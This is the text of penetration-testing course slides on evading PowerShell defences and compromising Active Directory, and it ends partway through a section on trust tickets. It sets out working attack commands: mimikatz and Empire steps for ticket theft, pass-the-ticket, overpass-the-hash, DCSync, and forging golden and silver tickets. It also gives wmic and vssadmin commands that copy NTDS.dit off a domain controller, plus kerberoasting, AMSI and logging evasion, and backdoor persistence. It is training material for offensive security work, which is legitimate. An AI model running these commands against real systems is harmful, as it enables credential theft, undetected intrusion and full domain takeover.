Since we are talking about avoidance, if PowerShell v2 is

present on a system, we should use it for our attacks.

PowerShell v2 has none of the security enhancements we

mentioned previously. It is not uncommon to see a system
having PowerShell v2 and v5 installed.

PT e treme - Caendra Inc. © 2017

Bypassing PowerShell’s Security Enhancements

Make sure that you check PSAmsi. PSAmsi is a tool for

auditing and defeating AMSI signatures.

Additionally, this script includes various AMSI bypasses, all in

one place.

PT e treme - Caendra Inc. © 2017

Bypassing PowerShell’s Security Enhancements

Constrained Language Mode and PowerShell Logging Bypasses

One of the most beloved PowerShell attack tools PS-Attack is

a single executable which contains some of the most popular
and effective PowerShell attack tools that are out there.

PT e treme - Caendra Inc. © 2017

Bypassing PowerShell’s Security Enhancements

It encrypts them into an executable. There’s a build tool as

well, so we can custom encrypt our own. When PS-Attack
runs, it decrypts these files or PowerShell functions in
memory, where we can run them.

PT e treme - Caendra Inc. © 2017

Bypassing PowerShell’s Security Enhancements

Guess what. Constrained language mode is no longer a

problem because running PowerShell code from an
executable bypasses the standard mechanism that handles
constrained language mode.

This happens due to compatibility reasons.

PT e treme - Caendra Inc. © 2017

Bypassing PowerShell’s Security Enhancements

Following you can see a system where PowerShell is running

in constrained language mode.

PS-Attack was able to load Mimikatz successfully though.

PT e treme - Caendra Inc. © 2017

Bypassing PowerShell’s Security Enhancements

PT e treme - Caendra Inc. © 2017

Bypassing PowerShell’s Security Enhancements

What about PowerShell logging? It bypasses that also!

Why does this happen? Let’s take for example Windows 7.

On Windows 7 we have PowerShell v2 as our base level
PowerShell version and when we install PowerShell version
5, version 5 kind of layers on top of that.

PT e treme - Caendra Inc. © 2017

Bypassing PowerShell’s Security Enhancements

PS-Attack through unmanaged PowerShell and some other

fun trickery actually calls the
system.management.automation.dll, that is PowerShell, at
that lower version (version 2).

This enables it to bypass PowerShell logging.

PT e treme - Caendra Inc. © 2017

Bypassing PowerShell’s Security Enhancements

PowerShell v5 is installed and PowerShell logging is configured. We see no events though…

PT e treme - Caendra Inc. © 2017

Bypassing PowerShell’s Security Enhancements

Smarter organizations will remove PowerShell v2 from

Windows 10. This can be done by actually unchecking a box.

When that happens, the empty logs we saw previously will

be filled with data, when PS-Attack is executed.

PT e treme - Caendra Inc. © 2017

Bypassing PowerShell’s Security Enhancements

Constrained language mode undeniably is an effective

PowerShell security measure. It can prevent a lot PowerShell
based attacks.

It is not a panacea though. Keep in mind that bypassing

constrained PowerShell is possible and not all PowerShell
“attack scripts” will be blocked.

PT e treme - Caendra Inc. © 2017

Bypassing PowerShell’s Security Enhancements

For more constrained language mode bypasses, you are

encouraged to study the following two blog spots.
✓ https://improsec.com/blog//babushka-dolls-or-how-to-bypass-
application-whitelisting-and-constrained-powershell

✓ http://www.exploit-monday.com/2017/08/exploiting-powershell-code-
injection.html

PT e treme - Caendra Inc. © 2017

Numerous paths exist following which an attacker can totally
compromise Active Directory. We will cover the most
effective ones.

The attacking methods covered, assume that the attacker

has already gained an initial foothold on the network.
Specifically, we will cover the following:

PT e treme - Caendra Inc. © 2017

✓ MS14-068 Kerberos vulnerability
✓ Unconstrained Delegation & Credential reuse (pass-the-ticket)
✓ Credential reuse (OverPass-the-hash)
✓ Pivoting with Local Admin & Passwords in SYSVOL
✓ Dangerous built-in groups usage
✓ Dumping AD domain credentials
✓ Forging Golden Tickets (incl. abusing trust relationships)
✓ Kerberoast
✓ Forging Silver Tickets
✓ Forging Trust Tickets
PT e treme - Caendra Inc. © 2017
The Mimikatz patch (KB2871997)

Since we are going to heavily use mimikatz in this module,

we should not forget to mention that KB2871997 sets a
registry key that prevents clear text passwords from being
stored in LSASS. This patch can easily be subverted.

Additinoally, a large percentage of the attacks we will cover,

do not require clear text passwords.
PT e treme - Caendra Inc. © 2017
AMSI Evasion & Clear-
text Passwords Despite
the Mimikatz Patch

PT e treme - Caendra Inc. © 2017

MS14-068
On an unpatched environment you may want to look for the
MS14-068 Kerberos vulnerability.

Exploiting this vulnerability enables the re-writing of a ticket

from domain user to domain admin in 5 minutes.

PT e treme - Caendra Inc. © 2017

MS14-068

The issue MS14-068 leverages is an insufficiently secure

mechanism used by Domain Controllers to validate group
membership in Kerberos tickets.

As of Windows Server 2012 (R2) onwards, this vulnerability

cannot be easily exploited.

PT e treme - Caendra Inc. © 2017

MS14-068

To exploit the abovementioned vulnerability we can use

PyKEK or kekeo suite.

PT e treme - Caendra Inc. © 2017

MS14-068

Kekeo scans for vulnerable DCs and requests a delegation

ticket at the end.

Actually, kekeo adds a last step that is missing from PyKEK. It

uses the exploit generated TGT to get an impersonation TGT
which works everywhere.

PT e treme - Caendra Inc. © 2017

MS14-068

For a detailed ms14-068 exploitation walkthrough please

refer to the following link:

https://blog.cptjesus.com/posts/ms14068

PT e treme - Caendra Inc. © 2017

Moving on, let’s see how one can leverage unconstrained
delegation in order to escalate his privileges in the domain.

As the attack scenario progresses, we will also introduce you

to the pass-the-ticket Kerberos attack.

PT e treme - Caendra Inc. © 2017

Unconstrained Delegation

Kerberos “double-hop” issue

ADSecurity.org
PT e treme - Caendra Inc. © 2017
Unconstrained Delegation

When the AD was released, MS recommended using

Kerberos. The problem is, the service ticket a user gets for
the web server will not work on the database server. This
means that the web server will not be able to perform
actions on the database, impersonating the user. This is
called the Kerberos “double-hop issue.”

PT e treme - Caendra Inc. © 2017

Unconstrained Delegation

So, how did MS fix this?

They came up with unconstrained delegation.

PT e treme - Caendra Inc. © 2017

Unconstrained Delegation

PT e treme - Caendra Inc. © 2017

Unconstrained Delegation

To identify computers with Kerberos unconstrained

delegation, we can simply use the following PowerView
command.
>> Get-DomainComputer -Unconstrained

PT e treme - Caendra Inc. © 2017

Unconstrained Delegation

Running this command in our testing “ELS” domain returned

the following.

PT e treme - Caendra Inc. © 2017

Unconstrained Delegation

Why unconstrained delegation is so bad?

When a user requests a service ticket for a service running

on a server which has an unconstrained delegation, the DC
takes a copy of the user’s TGT, puts it into the service ticket
and delivers it back to the user.

PT e treme - Caendra Inc. © 2017

Unconstrained Delegation

So, when the user provides that service ticket to the server
hosting the requested service, that TGT is placed in LSASS (in
memory) for later use.

PT e treme - Caendra Inc. © 2017

Unconstrained Delegation

To identify privileged users whose credentials are not

protected when interacting with a system featuring
unconstrained delegation, we can use the following
PowerView Command.
>> Get-DomainUser -AllowDelegation -AdminCount

PT e treme - Caendra Inc. © 2017

Unconstrained Delegation

Running this command in our testing “ELS” domain returned

the following.

The 2ndAdmin user is a

Domain Administrator
whose credentials are not
protected when interacting
with a machine featuring
unconstrained delegation

PT e treme - Caendra Inc. © 2017

Unconstrained Delegation

Let’s see how we can leverage unconstrained delegation, in a

practical scenario, using the machine and the Domain
Administrator account we identified previously.

PT e treme - Caendra Inc. © 2017

Unconstrained Delegation

Suppose we were able to social engineer the “2ndAdmin”

Domain Administrator to connect to the server featuring
unconstrained delegation over a Kerberos service.

Specifically, we lured the “2ndAdmin” Domain Administrator

into connecting to a network share inside the machine
featuring unconstrained delegation.

Screenshot from
2ndAdmin’s workstation.

PT e treme - Caendra Inc. © 2017

Unconstrained Delegation

Note that the administrator doesn’t even have to type in his

credentials, connecting to a network share is enough.

Of course, we should have compromised the server

configured with unconstrained delegation prior to the
following steps, through an admin or service account.

PT e treme - Caendra Inc. © 2017

Unconstrained Delegation

Through this network session, we can get the 2ndAdmin’s

TGT, then pass-the-ticket and using PowerShell remoting
connect to a DC.

With access to a DC, we can dump the KRBTGT account’s

password hash, which, as you will see later on, is an
important asset to have.

PT e treme - Caendra Inc. © 2017

Unconstrained Delegation

Through our PowerShell empire agent, we first dump and

export all available tickets in the machine.
>> usemodule credentials/mimikatz/command
>> set Command sekurlsa::tickets /export
>> run

PT e treme - Caendra Inc. © 2017

Unconstrained Delegation

The 2ndAdmin’s TGT will be included since he connected to the

network share and his credentials were insufficiently protected.
Net Session
with the TGT

PT e treme - Caendra Inc. © 2017

Unconstrained Delegation

Now, we pass the ticket using the “kerberos::ptt” mimikatz

command.
>> usemodule credentials/mimikatz/command
>> set Command kerberos::ptt [0;57b126][email protected]

PT e treme - Caendra Inc. © 2017

Unconstrained Delegation

We will use PowerShell remoting to connect to the DC, using

the 2ndAdmin’s ticket we just passed to the compromised
machine.

To achieve that, we can use PowerShell empire’s

invoke_psremoting lateral movement method as follows.
>> usemodule lateral_movement/invoke_psremoting

PT e treme - Caendra Inc. © 2017

Unconstrained Delegation

We successfully compromised
the DC, using PSRemoting
with the 2ndAdmin ticket we
captured and passed.

PT e treme - Caendra Inc. © 2017

Unconstrained Delegation

Compromising the domain’s DC provides us with great power.

As you will see later on, we can now create golden tickets
since we know the KRBTGT account’s password hash. The
KRBTGT account’s password hash can be dumped as follows.
>> usemodule credentials/mimikatz/command
>> set Command sekurlsa::krbtgt

PT e treme - Caendra Inc. © 2017

Unconstrained Delegation

Constrained Delegation can also be misconfigured in a way

that allows lateral spread.

Please refer to the following link for details:

http://www.harmj0y.net/blog/activedirectory/s4u2pwnage/

PT e treme - Caendra Inc. © 2017

OverPass-the-Hash (Making the best of NTLM password
hashes)

When we are in possession of NTLM password hashes, we

can pass-the-hash, but this is getting detected nowadays
(event 4624). Not only pass-the-hash is getting detected, but
specific internals prevents us from using it against newer
systems.

PT e treme - Caendra Inc. © 2017

OverPass-the-hash

For the specifics of those internals, as well as for

understanding where we can perform pass-the-hash, refer to
the link below.

http://www.harmj0y.net/blog/redteaming/pass-the-hash-is-
dead-long-live-localaccounttokenfilterpolicy/

PT e treme - Caendra Inc. © 2017

OverPass-the-hash

What we could do is perform OverPass-the-hash.

By clearing out all the Kerberos encryption keys that are on a

system and injecting an extracted NTLM password hash, we
can take that password hash and switch it over so that we’re
effectively using a Kerberos ticket. This is a lot more difficult
to detect.

PT e treme - Caendra Inc. © 2017

OverPass-the-hash

That way, when we connect to a Kerberos enabled service,

the normal Kerberos procedure is conducted, but with the
NTLM password hash that we injected.

PT e treme - Caendra Inc. © 2017

OverPass-the-hash

Let’s go through the whole OverPass-the-hash procedure and

also show you how to make this attack stealthier.

PT e treme - Caendra Inc. © 2017

OverPass-the-hash
After an initial compromise, we executed mimikatz on the
compromised machine. Luckily, we found a Domain
Administrator’s NTLM password hash.

PT e treme - Caendra Inc. © 2017

OverPass-the-hash

Let’s see how we can execute an OverPass-the-hash attack

and access the domain controller’s contents.

We can just use PowerShell empire’s

credentials/mimikatz/pth module. If we choose this path, a
mimikatz command will be executed similar to the following.

PT e treme - Caendra Inc. © 2017

OverPass-the-hash

Executing “sekurlsa::pth,” specifying only the NTLM password

hash, will likely cause an alert since the encryption method of the
Encrypted_Timestamp field of AS_REQ message is actually being
downgraded.

PT e treme - Caendra Inc. © 2017

OverPass-the-hash
To make the OverPass-the-hash attack stealthier, we will also
specify AES keys. Those AES keys can be extracted as follows,
using empire’s credentials/mimikatz/command module.
>> usemodule credentials/mimikatz/command
>> set Command sekurlsa::ekeys

PT e treme - Caendra Inc. © 2017

OverPass-the-hash

Finally, we will execute the sekurlsa::pth command specifying

the AES keys we extracted. Below you can see the result.
>> usemodule credentials/mimikatz/command
>> set Command sekurlsa::pth /user:2ndAdmin /domain:els.local
/aes256:b3ed8ba2447b1f0e06d2ab072a4afd4a3f76fc4adb23a0f5c2827655c72de9fb
/ntlm:49623ccc820122ab49b3f0f571b77186 /aes128:12345678901234567890123456789012
/run:notepad.exe

We can also
specify aes128
keys, even if they
don’t actually exist.

PT e treme - Caendra Inc. © 2017

OverPass-the-hash

Now, to access the Domain Controller’s contents, we must

steal the token from the spawned notepad process, as
follows.
>> steal_token 3536
>> shell dir \\lab-dc01.els.local\C$

PT e treme - Caendra Inc. © 2017

OverPass-the-hash

PT e treme - Caendra Inc. © 2017

Pivoting with Local Admin & Passwords in SYSVOL

It is not uncommon that the same set of credentials is being

used across the domain. This is usually the case with local
administrator accounts. If we identify those credentials, we
can easily move laterally into the network.

PT e treme - Caendra Inc. © 2017

Pivoting with Local Admin & Passwords in SYSVOL

Whenever a Group Policy Preference is created inside

SYSVOL, an associated XML file is also created containing
data relevant to the configuration to be deployed. If a
password is included, it is encrypted with AES-256 bit
encryption. It is not uncommon to come across local
administrator passwords inside a GPP.

PT e treme - Caendra Inc. © 2017

Pivoting with Local Admin & Passwords in SYSVOL

Microsoft released the AES encryption key, so always take a

look at SYSVOL, which we remind you is world readable, for
(local administrator) passwords.

A patch was released preventing the insertion of credentials

in GPPs. Older credentials that have been placed in SYSVOL
before the patch will persist though.

PT e treme - Caendra Inc. © 2017

Dangerous built-in groups usage
Organizations usually use built-in groups instead of custom
delegation. Members of ‘Account Operators’ and ‘Print
operators’ can log on to the main controller by default.

Consequently, if we compromise a simple helpdesk account,

we may be able to compromise the entire domain.

PT e treme - Caendra Inc. © 2017

Dumping AD Domain Credentials
As simulated attackers, we want to dump domain
credentials. That way we can be anyone we want or maybe
create golden tickets, as you will see later on.

The first way to do this is locate the NTDS.dit file (the AD

database file). The other way is to steal credentials.

PT e treme - Caendra Inc. © 2017

Dumping AD Domain Credentials

Finding NTDS.dit on the network

Not everyone is familiar with the exact location of that
database file in their environment. It could be found on DC
backups or an external network storage device even.

PT e treme - Caendra Inc. © 2017

Dumping AD Domain Credentials

Additionally, a VMware administrator has the ability clone a

virtual DC within Vmware. If we compromise such an
administrator, we can clone a virtual DC.

To access the NTDS.dit file, we don’t even have to start the

clone. We can just copy down the storage files associated
with it.

PT e treme - Caendra Inc. © 2017

Dumping AD Domain Credentials

No alarms are going to go off in AD or the DC because of a

triggered event.

PT e treme - Caendra Inc. © 2017

Dumping AD Domain Credentials

When we jump on a sensitive box, we may not want to use a

tool like mimikatz. We can use task manager and dump
LSASS into a LSASS dump file. Then, we can copy that to
somewhere else and run mimikatz against it there.

PT e treme - Caendra Inc. © 2017

Dumping AD Domain Credentials

It will be a little more difficult for them to discover that we

were on that box. This LSASS dump file may include Domain
Admin credentials.

PT e treme - Caendra Inc. © 2017

Dumping AD Domain Credentials

Dumping LSASS (Using Task Manager)

1 2

PT e treme - Caendra Inc. © 2017

Dumping AD Domain Credentials

If we manage to extract Domain Administrator credentials,

what we should do next, is remotely get the NTDS.dit file and
the SYSTEM registry hive.

With those two files, we will be able to acquire every

password hash of the domain. Let’s see some ways of
remotely getting those files.

PT e treme - Caendra Inc. © 2017

Dumping AD Domain Credentials Copy NTDS.dit and SYSTEM registry hive from
Shadow volume creation VSS snapshot to C: drive.

Remotely Get the DIT

>> wmic /node:DC_hostname /user:Domain\User /password:password process call create "cmd
/c vssadmin create shadow /for=C: 2>&1 > c:\vss.log“
>> wmic /node:DC_hostname /user:Domain\User /password:password process call create "cmd
/c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit
C:\windows\temp\NTDS.dit 2>&1 > c:\vss2.log“
>> wmic /node:DC_hostname /user:Domain\User /password:password process call create "cmd
/c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM
C:\windows\temp\SYSTEM.hive 2>&1 > c:\vss2.log"

Remotely Get the DIT (when no clear-text password exists)

>> wmic /authority:“Kerberos:Domain\DC_Hostname“ /node:DC_hostname process call create
…

You will have to pass-the-ticket before

executing this command
PT e treme - Caendra Inc. © 2017
Dumping AD Domain Credentials

Pulling the NTDS.dit remotely using PowerSploit‘s Invoke-

NinjaCopy is another option. Invoke-NinjaCopy leverages PS
Remoting. You can use it from inside PowerShell empire as
follows.
>> usemodule collection/ninjacopy

PT e treme - Caendra Inc. © 2017

Dumping AD Domain Credentials

We can also use NTDSUtil. NTDSUtil is a tool used by

administrators to administer or manage the AD database.
Access to the DC is required to execute NTDSUtil.

PT e treme - Caendra Inc. © 2017

Dumping AD Domain Credentials

If we use NTDSUtil to create an “install from media” it makes

a copy of the NTDS.dit (and the SYSTEM registry hive) for us.
>> ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q

PT e treme - Caendra Inc. © 2017

Dumping AD Domain Credentials

Finally, to extract every password hash of the domain, we can

use impacket’s secretsdump.py as follows.
>> python secretsdump.py -system /root/Desktop/temp/registry/SYSTEM -ntds
/root/Desktop/temp/Active\ Directory/ntds.dit LOCAL

PT e treme - Caendra Inc. © 2017

Dumping AD Domain Credentials

DCSync (mimikatz)
A better approach in acquiring all of the domain’s password
hashes is DCSync. DCSync is a mimikatz feature that enables
us to act as a Domain Controller and request password data
from the targeted DC.

PT e treme - Caendra Inc. © 2017

Dumping AD Domain Credentials

Before DCSync was introduced, what we had to do to extract

the KRBTGT password was run Mimikatz or Invoke-Mimikatz
on a DC.

PT e treme - Caendra Inc. © 2017

Dumping AD Domain Credentials

DCSync enables us to pull password hashes (including

previous ones) over the network without the interactive
logon requirement and without pulling the NTDS.dit file.

PT e treme - Caendra Inc. © 2017

Dumping AD Domain Credentials

Special rights are required in order to run DCSync. Members

of the ‘Administrators,’ ‘Domain Admins’ or ‘Enterprise
Admins’ groups as well as the DC computer account itself can
run DCSync.

PT e treme - Caendra Inc. © 2017

Dumping AD Domain Credentials

The interesting thing is that a normal domain user can be

delegated the rights needed to extract password data.

Those rights are:

• Replicating Directory Changes
• Replicating Directory Changes All
• Replicating Directory Changes In Filtered Set (required in some
environments

PT e treme - Caendra Inc. © 2017

Dumping AD Domain Credentials
For example, after domain compromise, we assigned the
normal domain user “employee4” the rights needed for
DCSync execution.

PT e treme - Caendra Inc. © 2017

Dumping AD Domain Credentials

Employee4 user can now be used for stealthy persistence. As

you can see below, he is now able to extract any password
data, using DCSync.
>> lsadump::dcsync /domain:els.local /user:ELS\krbtgt

PT e treme - Caendra Inc. © 2017

Dumping AD Domain Credentials

During an engagement, you should also rely on obscure

keylogging techniques, to identify privileged credentials.

PT e treme - Caendra Inc. © 2017

Alternative Paths for
Credential Extraction

PT e treme - Caendra Inc. © 2017

Once a domain is compromised, we are in possession of the
KRBTGT account’s password hash.

The KRBTGT account is used to encrypt and sign all Kerberos

tickets within a domain.

PT e treme - Caendra Inc. © 2017

Golden Tickets

Consequently, we can forge Kerberos tickets (TGTs) that can

be used to request TGS tickets for any service on any
computer in the domain.

Those forged TGT tickets are called Golden Tickets.

PT e treme - Caendra Inc. © 2017

Golden Ticket (Forged TGT) Communication
No AS-REQ or AS-REP communication
exists with the DC. Golden Ticket is
sent to the DC as part of the TGS-REQ
to get a TGS.

ADSecurity.org
PT e treme - Caendra Inc. © 2017
Golden Tickets

Golden Ticket creation requirements.

• Domain Name
• Domain SID
• Domain KRBTGT Account NTLM password hash
• UserID for impersonation

PT e treme - Caendra Inc. © 2017

Golden Tickets

Until recently, a Golden Ticket would work only within the

domain where it was created. The addition of SID history
changed that.

PT e treme - Caendra Inc. © 2017

Golden Tickets

In essence, what SID history brings to the table, is the ability

to include in a Golden Ticket (or a Silver one) any group in
the AD Forest and use it for authorization.

PT e treme - Caendra Inc. © 2017

Golden Tickets

So, if for example, we manage to extract a child domain’s

KRBTGT account password, then, leveraging SID history, we
can add the Forest Enterprise Admins group to our Golden
Ticket.

What this essentially means is that our Golden Ticket can be

used to compromise any domain in the forest!

PT e treme - Caendra Inc. © 2017

Golden Tickets

Let’s go through the whole procedure, assuming we have

already compromised the “ELS-CHILD” domain.

We will forge a Golden Ticket and leverage SID history to

compromise the parent domain as well.

PT e treme - Caendra Inc. © 2017

Golden Tickets

We have an empire agent running in “ELS-Child” domain’s

DC. Let’s first get all the trusts for the current domain.

>> usemodule situational_awareness/network/powerview/get_domain_trust

A Bidirectional trust exists between ‘els-child.els.local’ and its parent

‘els.local’. Since this is a forest trust we can leverage our DA credentials in
the child domain to compromise the entire forest.
PT e treme - Caendra Inc. © 2017
Golden Tickets

In order to leverage SID history, we first need to identify the

SID of the parent domain. We can do that by resolving the
ELS\krbtgt account to its SID.
>> usemodule management/user_to_sid

PT e treme - Caendra Inc. © 2017

Golden Tickets

Let’s now extract the “ELS-Child” domain’s KRBTGT account

password hash, using DCSync.

>> usemodule credentials/mimikatz/dcsync

PT e treme - Caendra Inc. © 2017

Golden Tickets

PT e treme - Caendra Inc. © 2017

Golden Tickets

Now we have everything we need to forge our Golden Ticket.

We can forge it as follows, using the
powershell/credentials/mimikatz/golden_ticket empire
module:
>> usemodule credentials/mimikatz/golden_ticket

The actual mimikatz command being submitted behind the

scenes is similar to the following:
>> kerberos::golden /admin:whatever /domain:child_domain_name /sid:child_domain_SID
/sids:parent_domain_SID-519 /krbtgt:child_domain’s_krbtgt_password_hash /startoffset:0
/endin:600 /renewmax:10080 /ptt

PT e treme - Caendra Inc. © 2017

Golden Tickets

We can impersonate any Empire has saved the “els-

user, existing or non-existing. child” domain’s KRBTGT
When /user and /id for a account password hash on its
ticket do not match, the credential store. If you don’t
ticket will only work for 20 like this approach simply
minutes. submit the KRBTGT account’s
password hash on the
The parent domain’s SID is “krbtgt” option.
specified, having 519 at the
end. 519 is the Group ID for
“Enterprise Admins”.

For your reference the

important Group IDs in AD
are:
513: Domain Users
512: Domain Admins
518: Schema Admins
519: Enterprise Admins
520: Group Policy Creator
Owners

PT e treme - Caendra Inc. © 2017

Golden Tickets

The Golden Ticket is automatically passed, and we can now

access the parent domain’s DC.
>> shell dir \\parent_domain’s_DC\C$

PT e treme - Caendra Inc. © 2017

Golden Tickets

Evasion Note:
Be aware that the execution of DCSync causes some log
entries. To not create any additional noise while
compromising the parent domain (DCSyncing against the
parent), we can use inside the “ExtraSids (sids)” option the
‘Domain Controllers’ SID of the parent domain and the
‘Enterprise Domain Controllers’ SID.

PT e treme - Caendra Inc. © 2017

Golden Tickets

If we would like to completely compromise the parent

domain’s DC, we can use the invoke-DCOM lateral movement
method.
>> usemodule lateral_movement/invoke_dcom

PT e treme - Caendra Inc. © 2017

Golden Tickets

Through Invoke-DCOM
we can invoke commands
on remote hosts via the
MMC20.Application COM
object over DCOM.

PT e treme - Caendra Inc. © 2017

Kerberoast
Once we have a list of Service Principal Names (SPNs)
associated with service accounts, these SPNs can be used to
request Kerberos TGS service tickets.

What we can do with those tickets is try to crack them

offline. This credential extracting procedure against service
accounts is known as kerberoasting.

PT e treme - Caendra Inc. © 2017

Kerberoast

Kerberoasting can be performed by a regular user without

sending any suspicious traffic to the target system. This
attack is usually effective due to weak domain password
policies. Most service account passwords are the same
length as the domain password minimum.

PT e treme - Caendra Inc. © 2017

Kerberoast

Taking into consideration that service accounts are usually

over-permissioned and oftentimes members of the Domain
Admins group, you can understand how devastating a
successful kerberoasting attack can be.

PT e treme - Caendra Inc. © 2017

Kerberoast

To sum up the steps are the following.

1. Requesting a TGS for the SPN of the target service account (a valid user
TGT is required)

2. The DC encrypts the ticket using the service account associated with the
specified SPN and sends back a TGS

3. The encryption type of the requested Kerberos service ticket is

RC4_HMAC_MD5 As we mentioned before, RC4_HMAC_MD5
means that the service ticket is encrypted
using the service account’s NTLM password
hash.
PT e treme - Caendra Inc. © 2017
Kerberoast

We will attempt to open the acquired ticket(s) by trying

numerous NTLM hashes.

If a ticket is opened, this means that we would have

identified the service account’s password.

PT e treme - Caendra Inc. © 2017

Kerberoast

Let’s see how kerberoasting looks like in our testing “ELS”

domain. Suppose we have compromised an unprivileged
user. Our next step, inside empire, will be the following.
>> usemodule credentials/invoke_kerberoast

PT e treme - Caendra Inc. © 2017

Kerberoast

All we have to do now is save this ticket to a file and run JtR
against it, as follows. Note that we are using JtR from this
repository.
>> ./john --format=krb5tgs path_to_ticket path_to_wordlist

We were able to
identify the service’s
PT e treme - Caendra Inc. © 2017 password
Kerberoast

If you would like to perform kerberoasting manually, then,

you would have to manually request a TGS for an SPN.
PS >> Add-Type -AssemblyName System.IdentityModel
PS >> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -
ArgumentList 'MSSQLSvc/DATABASESERVER.eLS.local:1433'

Then, use mimikatz’s “kerberos::list /export” command and

finally, run tgsrepcrack.py against the exported ticket.

PT e treme - Caendra Inc. © 2017

Kerberoast

Also be aware that if you compromise a user that has

GenericWrite/GenericAll DACL rights over a target, then
instead of force-resetting the target’s password, what you
can do is use PowerView to change the target’s SPN to any
value, perform kerberoasting against the service ticket and
finally repair the SPN.

PT e treme - Caendra Inc. © 2017

Kerberoast

This concept is known as targeted kerberoasting and can be

executed as follows, using PowerView functionality.
>> Get-DomainUser target | Select serviceprincipalname
>> Set-DomainObject -Identity target -SET @{serviceprincipalname='whatever/anything'}
>> $User = Get-DomainUser target
>> $User | Get-DomainSPNTicket | fl
>> $User | Select serviceprincipalname
>> Set-DomainObject -Identity target -Clear serviceprincipalname

PT e treme - Caendra Inc. © 2017

Let us now examine the specifics and usage of Silver Tickets.

The Silver Tickets’ scope is limited, but they are a lot

stealthier than their golden counterparts. Let’s start by
describing what a Silver Ticket is.

PT e treme - Caendra Inc. © 2017

Silver Tickets

A Silver Tickets is actually a valid TGS ticket. This valid TGS is

forged, so no communication with the DC occurs.

A Silver Ticket is encrypted/signed by the service account.

For the encryption/signing a computer account credential or
a service account credential can be used.

PT e treme - Caendra Inc. © 2017

Silver Tickets

A Silver Ticket works only against a targeted service on a

specific server.

Additionally, the vast majority of services do not perform

PAC validation. It is, therefore, possible for a Silver Ticket to
include a PAC that is unsubstantial.

PT e treme - Caendra Inc. © 2017

Silver Tickets

The requirement for Silver Ticket creation is:

➢ A service account’s password hash, if the targeted service operates under
a user account (such a hash can be acquired using Kerberoast).

➢ A computer account’s password hash, if the targeted service is hosted by

a computer (such a hash can be acquired using mimikatz).

PT e treme - Caendra Inc. © 2017

Silver Tickets

Silver Ticket (Forged TGs) Communication

No communication with the DC at all.
Steps 1 & 2 (AS REQ / AS REQ) &
steps 3 & 4 (TGS REQ / TGS REP) are
missing.

ADSecurity.org
PT e treme - Caendra Inc. © 2017
Silver Tickets

What is interesting about a silver ticket is that, if we, as

simulated attackers, get the password data for a service
running on a server, we can generate a silver ticket for that
service, without communicating with the DC at all.

PT e treme - Caendra Inc. © 2017

Silver Tickets

If an organization is pulling security events mainly off their

DCs, they are probably going to miss this.

PT e treme - Caendra Inc. © 2017

Silver Tickets

Let’s now see how a Silver Ticket is created.

Suppose we compromised a domain user, elevated our

privileges, used kerberoast and got the password hash of the
service under which MSSQL was operating.

PT e treme - Caendra Inc. © 2017

Silver Tickets

This service account’s password hash does not provide us

with any access to the underlying database(s). So, let’s create
a Silver Ticket for the MSSQLSvc SPN through an empire
agent, as follows.
>> usemodule credentials/mimikatz/command
>> set Command kerberos::golden /sid:S-1-5-21-1770822258-1552498733-1961591868
/domain:els.local /target:databaseserver.els.local:1433 /service:MSSQLSvc
/rc4:7142273fa7d01a6d919e584f9668e43e /user:appsvc /ptt

PT e treme - Caendra Inc. © 2017

Silver Tickets
With the Silver Ticket passed into the compromised machine,
we can now interact with the database. To be more precise,
we can interact with the database as a DBA.

PT e treme - Caendra Inc. © 2017

Silver Tickets

Additionally, there is a scenario where silver tickets are more

dangerous than golden ones.

As we mentioned earlier for Silver Ticket creation, we can

also use a computer account’s password hash.

PT e treme - Caendra Inc. © 2017

Silver Tickets

In a breach recovery scenario where an attacker has dumped

everything, and the IT department goes through changing all
the account passwords, the item that gets missed in
changing is usually the computer account passwords.

PT e treme - Caendra Inc. © 2017

Silver Tickets

A machine’s computer account password is being used to

encrypt service tickets for services running on that machine.

PT e treme - Caendra Inc. © 2017

Silver Tickets

Consequently, if we have the computer account password of

a DC we can create service tickets for all running services on
that DC, stating “We are a domain admin”…

PT e treme - Caendra Inc. © 2017

Silver Tickets

For example, let’s suppose that we have previously

compromised the entire domain and the IT department
changed every account but neglected to change the
computer account passwords.

PT e treme - Caendra Inc. © 2017

Silver Tickets

We still have the DC’s computer account password.

What we can do to re-compromise the DC, in a stealthy

manner, is create two Silver Tickets, one for the ‘http’ service
and one for the ‘wsman’ service.

PT e treme - Caendra Inc. © 2017

Silver Tickets

Let’s execute the below in any domain-joined system that we

left as a backdoor to the network, through mimikatz.
>> kerberos::golden /sid:S-1-5-21-1770822258-1552498733-1961591868 /domain:els.local
/target:lab-dc01.els.local /service:http /rc4:6cc5b7c69e11f4a2d3814ed4dcf70483
/user:Administrator /ptt

>> kerberos::golden /sid:S-1-5-21-1770822258-1552498733-1961591868 /domain:els.local

/target:lab-dc01.els.local /service:wsman /rc4:6cc5b7c69e11f4a2d3814ed4dcf70483
/user:Administrator /ptt

PT e treme - Caendra Inc. © 2017

Silver Tickets

If we pass those two tickets, we will gain admin rights to

WinRM or PowerShell Remoting on the DC.

We were able to connect

to the DC using PS
Remoting, from inside the
backdoored user’s
workstation.
PT e treme - Caendra Inc. © 2017
Silver Tickets

Notes:
• By default, computer account passwords change every 30 days, and two
passwords are stored on the computer.

• PAC validation wouldn’t be useful in this case since the targeted services
are system services

PT e treme - Caendra Inc. © 2017

When a trust is created, there’s a shared password called
inter-realm key. This exists for all trusts regardless of them
being created by an admin or automatically when adding a
new domain to an AD forest.

PT e treme - Caendra Inc. © 2017

Kerberos authentication in a cross-domain/forest situation

ADSecurity.org
PT e treme - Caendra Inc. © 2017
Trust Tickets

A user on the blue domain is already logged on and wants to

access a resource in the green domain, across the trust. The
DC on the blue domain creates and sends a new TGT to the
user along with the referral to the green domain DC.

PT e treme - Caendra Inc. © 2017

Trust Tickets

This cross-trust TGT is formatted in the same way as any TGT,

BUT it is not signed by the KRBTGT account for either of these
domains. It’s singed and encrypted with the inter-realm key
of the forest trust.

PT e treme - Caendra Inc. © 2017

Trust Tickets

If we can get access to this trust password then, we can forge

this cross-domain ticket.

This means that we can impersonate any user in the blue

domain and get access to any service or resource in the green
domain that has been permissioned for the blue domain.

PT e treme - Caendra Inc. © 2017

Trust Tickets

How to forge a Trust Ticket for an external trust to the AD

forest
The trust key can be extracted when dumping AD
credentials. Each trust has an associated account that
contains the trust NTLM password hash. This is what we will
use to forge Trust Tickets. The command we will use is:
